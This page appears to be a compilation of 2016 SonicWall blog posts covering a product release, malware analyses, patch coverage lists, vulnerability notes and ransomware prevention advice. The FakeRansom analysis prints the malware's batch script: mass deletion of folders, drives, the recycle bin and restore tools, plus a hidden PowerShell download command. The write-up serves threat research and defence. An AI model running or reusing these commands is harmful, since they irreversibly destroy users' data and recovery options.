SonicWall Email Security 8.3 Delivers New Spam Detection and Authentication

/0 Comments/in /by

Summertime means different things to different people. Whether it be kids enjoying time off from school, or parents taking long family vacations, summertime gives everyone an opportunity to re-energize and re-focus.

Everyone that is, including hackers.

Threats to your infrastructure don’t take a vacation, and if you’re entrusted with securing your organization email, it’s important to not leave your guard down during these warm summer days.

SonicWall Email Security solutions continuously protects your email infrastructure from ever-increasing threats including spam, phishing attacks, and malware. And, now you can rest even further knowing that the protection provided by SonicWall Email Security has been improved once again. Our latest release, Email Security 8.3, delivers more effective protection against emerging threats, through the following key features:

  • New Spam-Detection Engine – utilizes both a retrained Adversarial Bayesian model, as well as a new machine learning model which leverages a Support Vector Machine approach
  • SMTP Authentication – if you’re concerned about preventing unauthorized users on your infrastructure, new SMTP authentication requires a user to authenticate prior to sending outbound emails

Additionally, SonicWall Email Security solutions continue leveraging a robust architecture to deliver superior protection with the following features:

  • Multi-Layer Protection – proven, patented, email scanning technologies deliver superior real-time protection
  • Automated Management and Reporting ““ minimize required administration time
  • Compliance & Encryption Management – protect against confidential data leaks and compliance violations
  • Flexible Deployment Options – to best meet business infrastructure requirements, including on-Premise, Virtual, and Cloud-based
  • Scalable – ability to configure for growth and redundancy, allows your infrastructure to grow as required without requiring large upfront costs
  • Multi-Tenancy – enables MSPs to provision and manage email security services for multiple customers

SonicWall System Architecture

Graphic of SonicWall's System Architecture of Email Security 8.3

SonicWall Email Security provides the comprehensive protection needed, so maybe you too can enjoy your summer!

SonicWall Email Security 8.3 is available today for download for those with a valid license. For more information please contact your preferred reseller, reach us directly at 888.557.6642 or sales@sonicwall.com, or visit us for product detail here.

Learn More

FakeRansom: Deletes files then demands payment for nothing (Jul 15th, 2016)

/in /by

The Sonicwall Threats Research team have observed a new “Ransomware” written by a seemingly lazy author. Traditionally, ransomware authors have a sense of honor and will actually restore files after the victim pays the ransom. This “Ransomware” however does not. It deletes everything in its path with no possibility of recovery. There is no encryption of files on the system. There is no key exchange with a remote key server. There is of course, a bitcoin address provided in order to “retrieve” deleted files. Unless the victim uses an un-delete tool immediately after infection the files are permanently lost.

Infection Cycle:

The Trojan makes the following DNS query and attempts to report the infection to the remote server hosted on Amazon Web Services:

The Trojan adds the following files to the filesystem:

  • %APPDATA%winstrsp.exe [Detected as GAV: FakeRansom.A (Trojan)]
  • %TEMP%winopen.exewinopen.exe [Detected as GAV: Fakelock.C (Trojan)]
  • %TEMP%~8.bat

The Trojan sets itself up to run on reboot using schtasks.exe. The file z544 is an xml file containing the task data:

The Trojan runs winopen.exewinopen.exe which displays the following image and shuts down the system within 1 minute:

It runs ~8.bat. Below is a sample of the instructions contained in the batch script:

      @echo off
      set folder="%AppData%LocalTemp*"
      cd /d %folder%
      for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)
      @echo off
      set folder="%USERPROFILE%Desktop*"
      cd /d %folder%
      for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)
      @echo off
      set folder="C:WindowsSystem32Restore*"
      cd /d %folder%
      for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)

It deletes everything on any attached shared folders:

      @echo off
      set folder="D:*"
      cd /d %folder%
      for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)
      @echo off
      set folder="E:*"
      cd /d %folder%
      for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)
      @echo off
      set Drive=C:
      if exist %Drive%$RECYCLE.BIN (
      pushd %Drive%$RECYCLE.BIN
      del /s /q .
      popd
      )

It deletes system executables that are responsible for managing system restore points:

      @echo off
      del "C:WindowsSystem32vssadmin.exe"
      timeout /t 2 /nobreak
      @echo off
      del "C:WindowsSystem32rstrui.exe"
      timeout /t 2 /nobreak

The script contains code that uses Windows PowerShell to download the main payment instructions image:

      @echo off
      C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -ExecutionPolicy bypass -noprofile -
      windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://s3-us-
      west-1.amazonaws.com/docs.pdf/anon.jpg','%USERPROFILE%DesktopPayment_Instructions.jpg');
      cmd /c '%USERPROFILE%DesktopPayment_Instructions.jpg'
      timeout /t 200 /nobreak

A quick look at the bitcoin address on blockchain.info shows that the operator has made some income, but not much:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: FakeRansom.A (Trojan)
  • GAV: Fakelock.C (Trojan)

Microsoft Security Bulletin Coverage (July 12, 2016)

/in /by

Dell SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of July 12, 2016. A list of issues reported, along with Dell SonicWALL coverage information are as follows:

MS16-084 Cumulative Security Update for Internet Explorer

  • CVE-2016-3204 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3240 Internet Explorer Memory Corruption Vulnerability
    IPS:11711 ” Internet Explorer Memory Corruption Vulnerability (MS16-084) 1 “
  • CVE-2016-3241 Internet Explorer Memory Corruption Vulnerability
    IPS:11712 ” Internet Explorer Memory Corruption Vulnerability (MS16-084) 2 “
  • CVE-2016-3242 Microsoft Browser Memory Corruption Vulnerability
    IPS:11713 ” Internet Explorer Memory Corruption Vulnerability (MS16-084) 3″
  • CVE-2016-3243 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3245 Internet Explorer Security Feature Bypass Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3248 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3259 Scripting Engine Memory Corruption Vulnerability
    IPS:11716 ” Scripting Engine Memory Corruption Vulnerability (MS16-084) 1 “
  • CVE-2016-3260 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3261 Internet Explorer Information Disclosure Vulnerability
    IPS:11717 ” Internet Explorer Information Disclosure Vulnerability (MS16-084) 1 “
  • CVE-2016-3273 Microsoft Browser XSS Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3274 Microsoft Browser Spoofing Vulnerability
    IPS:11718 ” Microsoft Browser Spoofing Vulnerability (MS16-084) 1″
  • CVE-2016-3276 Microsoft Browser Spoofing Vulnerability
    IPS:11719 ” Microsoft Browser Spoofing Vulnerability (MS16-084) 2″
  • CVE-2016-3277 Microsoft Browser Information Disclosure Vulnerability
    IPS:11724 ” Internet Explorer Memory Corruption Vulnerability (MS16-085) 9 “

MS16-085 Cumulative Security Update for Microsoft Edge

  • CVE-2016-3244 Microsoft Edge Security Feature Bypass
    IPS: 11721 “Internet Explorer Memory Corruption Vulnerability (MS16-085) 6 “
  • CVE-2016-3246 Microsoft Edge Memory Corruption Vulnerability
    IPS:11722 ” Internet Explorer Memory Corruption Vulnerability (MS16-085) 7 “
  • CVE-2016-3248 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3259 Scripting Engine Memory Corruption Vulnerability
    IPS:11716 ” Scripting Engine Memory Corruption Vulnerability (MS16-084) 1 “
  • CVE-2016-3260 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3265 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3269 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3271 Scripting Engine Information Disclosure Vulnerability
    IPS:11723 ” Internet Explorer Memory Corruption Vulnerability (MS16-085) 8 “
  • CVE-2016-3273 Microsoft Browser XSS Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3274 Microsoft Browser Spoofing Vulnerability
    IPS:11718 ” Microsoft Browser Spoofing Vulnerability (MS16-084) 1″
  • CVE-2016-3276 Microsoft Browser Spoofing Vulnerability
    IPS:11719 ” Microsoft Browser Spoofing Vulnerability (MS16-084) 2″
  • CVE-2016-3277 Microsoft Browser Information Disclosure Vulnerability
    IPS:11724 ” Internet Explorer Memory Corruption Vulnerability (MS16-085) 9 “

MS16-086 Cumulative Security Update for JScript and VBScript

  • CVE-2016-3204 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.

MS16-087 Security Update for Windows Print Spooler Components

  • CVE-2016-3238 Microsoft Print Spooler Remote Code Execution Vulnerability
    This is a local Vulnerability.
  • CVE-2016-3239 Windows Print Spooler Elevation of Privilege
    This is a local Vulnerability.

MS16-088 Security Update for Microsoft Office

  • CVE-2016-3278 Microsoft Office Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3279 Microsoft Office Remote Code Execution Vulnerability
    IPS: 11725 “Internet Explorer Memory Corruption Vulnerability (MS16-088) 10 “
  • CVE-2016-3280 Microsoft Office Memory Corruption Vulnerability
    IPS: 11726 “Internet Explorer Memory Corruption Vulnerability (MS16-088) 11”
  • CVE-2016-3281 Microsoft Office Memory Corruption Vulnerability
    SPY: 1100 “Malformed-File doc.MP.38”
  • CVE-2016-3282 Microsoft Office Memory Corruption Vulnerability
    SPY: 1101 “Malformed-File doc.MP.39”
  • CVE-2016-3283 Microsoft Office Memory Corruption Vulnerability
    SPY: 1102 “Malformed-File doc.MP.40”
  • CVE-2016-3284 Microsoft Office Memory Corruption Vulnerability
    There are no known exploits in the wild.

MS16-089 Security Update for Windows Secure Kernel Mode

  • CVE-2016-3256 Windows Secure Kernel Information Disclosure Vulnerability
    There are no known exploits in the wild.

MS16-090 Security Update for Windows Kernel-Mode Drivers

  • CVE-2016-3249 Win32k Elevation of Privilege Vulnerability
    This is a local Vulnerability.
  • CVE-2016-3250 Win32k Elevation of Privilege Vulnerability
    This is a local Vulnerability.
  • CVE-2016-3251 GDI Component Information Disclosure Vulnerability
    This is a local Vulnerability.
  • CVE-2016-3252 Win32k Elevation of Privilege Vulnerability
    This is a local Vulnerability.
  • CVE-2016-3254 Win32k Elevation of Privilege Vulnerability
    This is a local Vulnerability.
  • CVE-2016-3286 Win32k Elevation of Privilege Vulnerability
    This is a local Vulnerability.

MS16-091 Security Update for .NET Framework

  • CVE-2016-3255 .NET Information Disclosure Vulnerability
    There are no known exploits in the wild.

MS16-092 Security Update for Windows Kernel

  • CVE-2016-3258 Windows File System Security Feature Bypass Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-3272 Windows Kernel Information Disclosure Vulnerability
    There are no known exploits in the wild.

MS16-094 Security Update for Secure Boot

  • CVE-2016-3287 Secure Boot Security Feature Bypass Vulnerability
    There are no known exploits in the wild.

PHP TAR File Parsing Uninitialized Reference (CVE-2016-4343)

/in /by

A remote, unauthenticated vulnerability exists in PHP. The vulnerability allows an attacker to execute arbitrary code on the web server. CVE-2016-4343 is assigned to this vulnerability.

PHP is a server-side scripting language designed for web development but also used as a general-purpose programming language. PHP code may be embedded into HTML code, or it can be used in combination with various web template systems, web content management systems and web frameworks.

A remote code execution vulnerability exists in PHP due to lack of proper sanitation when parsing TAR files. It fails to properly validate the values inside the headers found in the file. This allows a remote attacker to create malicious TAR files to cause the vulnerable server to execute code.

The following versions of PHP are vulnerable:

  • PHP prior to 5.5.36
  • PHP prior to 5.6.22
  • PHP prior to 7.0.7

Dell SonicWALL team has written the following signature that helps protect our customers from this attack:

  • 11699: PHP phar_make_dirstream Function DoS

Seven Ways to Help Avoid A Ransomware Crisis

/0 Comments/in /by

The popularity and use of ransomware appear to be spreading at record pace in 2016 as cybercriminals are actively using ransomware to hold businesses, institutions and even individuals hostage. No one is immune to this sort of attack. If you’ve been following the news, you’re probably aware that authorities and security experts are calling this the new crisis in cybercrime today.

The rise of ransomware within the hacking economy can be attributed to how simple and fast attackers can potentially capitalize on thousands or millions of their victims in a short period of time as opposed to a targeted attack, which requires more work and time to monetize from a single data breach. To date, the SonicWall Threat Research Team has observed a 78% growth in ransomware variants over 2015. With recent discovery of the new “DMA Locker” in the wild earlier this month, the team found that organizations are hit by a range of highly active ransomware including:

  • CryptoWall (considered most dangerous and used so far)
  • TeslaCrypt
  • TorrentLocker
  • PadCrypt
  • Locky
  • CTB-Locker
  • FAKBEN
  • PayCrypt
  • DMA Locker

Below is a visual sample of the DMA Locker to help give you a good idea what an infected system looks like. A quick search using the bitcoin address “1C8yA7wJuKD4D2giTEpUNcdd7UNExEJ45r” on the www.blockchain.info website shows that the same bitcoin address has been used in multiple transactions. This indicates that thousands of dollars have already been paid out by victims since its introduction.

Visual sample of the DMA Locker on the left and bitcoin address screenshot on the right.

With thousands of daily ransomware attacks, your success in maintaining normal operations is paramount towards the achievement of your business objectives. So it’s best to conduct routine security reviews, and take any and all necessary steps to improve your cyber-defenses and prevent ransomware from spreading across your networks. This is a risk that can easily be mitigated by following these seven recommendations:

1. Training and awareness

It’s imperative to put some governance policy in place to make certain everyone in your organization is educated about the dangers of ransomware and trained to identify methods cyber-criminals use to compromise devices, through social media, social engineering, suspicious websites and downloads, and various spam and phishing scams.

2. Email security

Since phishing emails are predominantly used by attackers to distribute ransomware, you want to deploy a capable email security solution that can scan all attachments for malicious content and isolate all files embedded with ransomware.

3. Use a multi-layered approach to network security

Cyber-criminals are very good at using the latest exploit kits and web vulnerabilities to infect systems and devices with ransomware. Enhance your security posture by eliminating siloed security architecture. A more effective way is to employ an adaptive cyber defense platform that leverages multiple integrated threat prevention capabilities to provide many different ways to break the malware infection cycle, including advance threat protection, gateway anti-malware, intrusion prevention and other available network-based security services.

4. Secure the endpoints

Mobile devices are particularly targeted as reported in the 2016 SonicWall Security Annual Threat Report with the emerging ransomware threats on the Android platform. So, do everything possible to make sure all your mobile endpoints are secured as they can be because devices of this sort are frequently outside and external to your network without firewall protection. There are many good endpoint security options to satisfy your risk tolerance. At a minimum, you would want to consider layering your protection with patch management, web content filtering and signature-less anti-virus (AV) software that uses advanced machine learning and artificial intelligence to detect advanced threats on top of your traditional signature-based AV solution.

5. Network segmentation

Ransomware attacks always look for opportunities to spread from the endpoint to the server/storage, where valuable primary and secondary data are stored. Imagine the potential harm done to an organization if cyber criminals were able to gain unauthorized and unchallenged network access and freely move laterally within its unsegmented networks. To contain and mitigate threat propagation during an attack, it’s essential that you keep your critical applications, data and devices isolated on a separate networks or virtual LANs to prevent the spread of an attack.

6. Backup and recovery

A California-based hospital recently paid approximately $17,000 to recover its data from a ransomware attack by obtaining the decryption key to quickly return its administrative functions to normal capacity. This unfortunate incident provides an opportunity for us to learn from other misfortunes. Another safeguard against having to pay the ransom is a speedy, reliable backup and disaster recovery (DR) strategy that allows you to restore full operation with minimal disruption. Make sure the solution allows you to automatically perform testing and verification to ensure data is restorable and recovery service level is met.

7. Encrypted attacks

Not long ago, Yahoo users were targets of one of the largest malvertising campaign after a criminal entity bought an ad space on Yahoo’s website in order to plant malicious ads with the purpose of installing ransomware on users’ computers visiting the site. The redirection code planted in the malicious advertisements used SSL/TLS encryption, which made it difficult for traditional defense systems to detect.

If you’re currently not inspecting HTTPS traffic, then you are effectively blind to any attacks utilizing SSL/TLS. Therefore, it is absolutely essential that you deploy the next-generation firewall that has a high performing SSL inspection engine to rapidly decrypt and inspect all internet traffic coming from or going to clients for threats hidden within those SSL sessions.

For more detailed information, I recommend you to read our technical brief: “How to protect against ransomware.”

DOWNLOAD TECH BRIEF

Bart Ransomware spotted in the wild ( July 1, 2016)

/in /by

The Dell SonicWall Threats Research team has received reports of a new Ransomware Trojan, Bart which encrypts the system files by not using any encryption methods such as AES as we have seen earlier, but by just converting them to a password protected zip archive.

Infection cycle:

The Trojan lands on the victim’s machine as adobe media encoder file.

The Trojan adds the following files to the filesystem:

  • C:windowstemp(copy of original) [Detected as GAV: Bart.A (Trojan)]

The Trojan drops a batch file on the system:

  • C:autoexec.bat

Usually, the ransomware trojan connects to C&C server before encrypting the files. But in this case, it does not connect to any CRC server but encrypts all the files on the victim’s machine with the extension bart.zip, a password protected zip archive.

The trojan creates the following file on the victim’s desktop and also in each folder on the victim’s machine:

  • recover.txt

It displays the following file (recover.bmp) on the victim’s wall:

When visited the payment portal provided by the ransom note to decrypt the files, it demands the victim to pay 2 bitcoins. It also displays the information on how to purchase bitcoins.

We urge our users to always be vigilant and cautious with any unsolicited attachments specially if you are not certain of the source.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Bart.A (Trojan)

You Might Not Know You Are Still Using SSLv2.0 (July 1, 2016)

/in /by

Netscape Communications invented Secure Sockets Layer (SSL) protocol in 1994. It has been de facto standard for cryptographic protocol since then. Over the years the protocol has evolved (SSLv2.0 -> SSLv3.0 -> TLSv1.0 -> TLSv1.1 -> TLSv1.2) to increase security.

Today, SSLv2.0 no longer provides a sufficiently high level of security. SSLv2.0 deficiencies include the following:

  • Message authentication uses MD5. Most security-aware users have already moved away from any use of MD5.
  • Handshake messages are not protected. This permits a man-in-the-middle to trick the client into picking a weaker cipher suite than it would normally choose.
  • Message integrity and message encryption use the same key, which is a problem if the client and server negotiate a weak encryption algorithm.
  • Sessions can be easily terminated. A man-in-the-middle can easily insert a TCP FIN to close the session, and the peer is unable to determine whether or not it was a legitimate end of the session.

It’s been over 20 years since SSLv2.0 was published, and it’s been over 5 years since RFC 6176 deprecated SSLv2.0. However many people are still using the protocol, even though they might not be aware of it.

In June 2016, less than 2% of firewalls reported receiving SSLv2.0 Server Hello message:

In June 2016, more than 40% of firewalls reported receiving SSLv2.0 Client Hello message:

SSLv2.0 is insecure and can damage the system. Dell SonicWALL urges all our customers to review their (client/server) software settings and stop using SSLv2.0 immediately.

SonicWall Announces Channel Partner Award Winners at EMEA PEAK16

/0 Comments/in , /by

EMEA PEAK 16

Last week, SonicWall hosted more than 230 enthusiastic partners at our EMEA PEAK16 event and the information exchange was a valuable one for all of us. The city of Valetta in Malta, with its ancient stone walls and fortresses which have provided defense against attacks throughout history, proved an appropriate location for a security conference. The feedback we received from partners reaffirmed that as threats continue to evolve, customers need to constantly stay at least one step ahead of them. We heard the clear need to allow IT to move away from being an obstacle to the business to becoming an enabler, with technologies that protect from threats, but still provide easy access for all workers, especially those who are mobile or remote.

This week’s EMEA PEAK16 event reinforced for us that it’s more important than ever to provide a security portfolio that helps our partners reinforce their roles as trusted advisors. Partners took advantage of business and technical sessions designed to give them insight to the cyber threat landscape and how the Security portfolio drives real solutions to today’s threats.

EMEA PEAK16 wrapped with the recognition of those partners who exemplify commitment to the SonicWall portfolio and achieved substantial sales growth over the last year. The awards highlighted partner excellence Distribution, Channel Partners, New Partners and the coveted Project of the Year. Congratulations to the following winners:

  • 2015 SonicWall EMEA Best Distributor –Exertis
  • 2015 SonicWall EMEA Best Performing Partner –NetThreat
  • 2015 SonicWall EMEA Best New Comer –Ineo IT Solutions
  • 2015 SonicWall EMEA Special Jury Award –Data-Sec
  • 2015 SonicWall EMEA Project of the Year – Nalta Consultancy

EMEA PEAK16 was a great reminder of the commitment to mutual success we share with our Security partners, and the importance of our very important mission to protect our mutual customers from today’s ever evolving threats. Events like EMEA PEAK16 ‘with the opportunity for networking, along with educational sessions and new product information’ are key to our partner-dependent go-to-market strategy. I think the words of our partners sum it up best:

PEAK16 in Malta

“For me it was one of the best EMEA PEAK´s of the past years – great news, networking, direct contact in order to give feedback and get hot information directly from product-management, engineering, executives and had a lot of FUN! “Work hard – Party hard” and Business is made by people ““ that is one of the secrets to success!” said Nicolai Landzettel, CEO, Data-Sec UG

All of the sessions were interactive where we received strong, positive feedback on the progress of our portfolio and programs and validated the investments we are making to improve partner profitability, expand our sales and technical enablement offerings and build out our partner tools and infrastructure. Each of these elements are being optimized to better align with customer needs and partner engagement models. At EMEA PEAK16, we announced:

  • Enhancements to our Deal Registration program to make it more inclusive of SMB opportunities to reward partners who originate new customers and opportunities
  • Our partner Reward for Value framework which provides incremental discounts now available to partners with technical capabilities who deliver a proof of concept to their customers
  • New strategies for sustained partner sales and technical enablement including expanded curriculum and delivery options
  • A new sales accreditation program recently rolled out to the Security sales teams is now available to all Security Solutions Partners in July 2016. Designed to help continue driving the momentum behind the 30% increase in SonicWall certified Network Security partners over the last year, the program covers the full SonicWall portfolio and includes online learning, tools, training and accreditation.

We look forward to a continued strong year with our EMEA partners as we drive further advancements and enhancements in our portfolio and products and fulfill our mission to protect our mutual customers.

Zika Is Not the Only Virus You Can Get By Watching the Olympics

/0 Comments/in /by

It’s August 5, 2016 and you settle down at your computer to watch the Olympic opening ceremony. You have no fear of catching Zika, unlike the thousands of people in Rio. Feeling safe, you navigate to the official broadcast site of the games and click on Watch the Olympics live.

But wait, there’s fine print: Simply Sign-In Using Your TV Provider Account Login/Password And You’ll Have Access To FREE, LIVE Rio Olympics Coverage. Not cool. “Who pays for TV?” you ask yourself. “Haven’t they heard of streaming?” So you search on “Olympics live streaming free” and there, on the first page of results is:

The site doesn’t look official, but hey, the media player icon looks like YouTube, which you know is safe, so you click Play. The site asks you to download and install a video codec. The ceremony starts in five minutes and the screen screams “Stream in HD now!” You’re one step away from the Free Live Stream, so you click Accept”¦within microseconds, your computer is infected with a virus. Perhaps the video will start, perhaps it won’t, but in either case, the malware now on your computer will give you greater problems than missing the opening ceremonies.

How can you protect yourself from such a scenario? Here are some precautions you can take:

  1. Don’t go there. If a website is not an official site, chances are that it does not have the right to stream protected content. And if it does not have rights to stream, then the content is just bait for unsuspecting visitors like you.
  2. Don’t click that. So you ended up on the site anyhow. If it asks you to click a link or icon, tempts you with ads for free stuff, wants to do a download, or wants to install something, the only thing you should click is Close, as in close the browser.
  3. Update, update, update. Whether you are using a PC or a mobile device, update your operating system with the latest hotfixes. Update your browser to the latest level. Update your anti-virus software with the latest signatures. Configure your applications to do all these things automatically.
  4. Control and protect your network with a next-generation firewall. A next-generation firewall includes up-to-date security services that blocks websites of ill-repute, prevents malicious downloads, and kills the latest viruses. It even denies intrusions and attack attempts, snuffs out botnet traffic patterns, and recognizes which countries have the riskiest and most suspect Internet activities. You can’t get this level of security simply by following the first three precautions.

To learn more about the bad things that can infect you on the Internet and the ways that you can inoculate yourself, read our ebook – How ransomware can hold your business hostage.

Learn More

NTP crypto-NAK DoS

/in /by

ntpd is an implementation of Network Time Protocol which sets and maintains the system time of day synchronized with Internet standard time servers or any local references. Many major servers and devices come with inbuilt ntpd.

NTP works with different variants like client/server, symmetric, and broadcast. Symmetric mode is used for time synchronization between the servers with authentication. It operates with two modes active and passive. Active mode packets are used when connection is already set. If connection is not set, passive mode packets are used to set up short passive connection for authentication. If packet which fails to authenticate is received, it responds with crypto-NAK packet.

While processing incoming packets findpeer() function is called to see if packet is from existing peer. It returns pointer to peer structure or NULL depending upon whether peer is found or not. To check whether packet is crypto-NAK, valid_NAK() function is called. One of the parameters for the function is pointer from findpeer() function. Without checking the pointer for NULL, valid_NAK() tries to access keyid and flags field of peer structure. Which causes NULL pointer dereference.

Remote attacker can send undesired crypto-NAK packet to exploit this vulnerability which can lead to Denial of Service.

Dell SonicWALL has researched this vulnerability. The following signature has been created to protect their customers.

  • IPS: 11240 NTP Daemon Crypto-NAK Authentication Bypass 1